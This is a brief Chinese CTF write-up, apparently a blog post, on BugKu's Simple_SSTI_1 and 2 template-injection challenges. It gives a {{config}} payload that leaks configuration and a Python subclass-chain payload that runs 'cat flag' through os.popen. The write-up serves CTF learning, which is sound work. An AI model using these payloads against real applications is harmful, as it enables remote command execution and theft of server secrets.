【web | CTF】BugKu CTF Simple_SSTI_1 和 2

天命:相信自己

一打开题目就告诉你输入flag参数,而且你输入什么就输出什么

输入:1  输出:1

很明显就是模板注入,Python的web框架独有的漏洞

那就简单,去查一下payload,一把梭

学习可以看这篇文章:https://www.cnblogs.com/tuzkizki/p/15394415.html

原理也不解释,就是拿poc一把梭
 

# flag在配置文件里
第一关是:flag={{config}}  

# 命令执行
第二关是:flag={{"".__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__import__('os').popen('cat%20flag').read()}}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星盾网安

能花钱买到的知识,都不贵

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值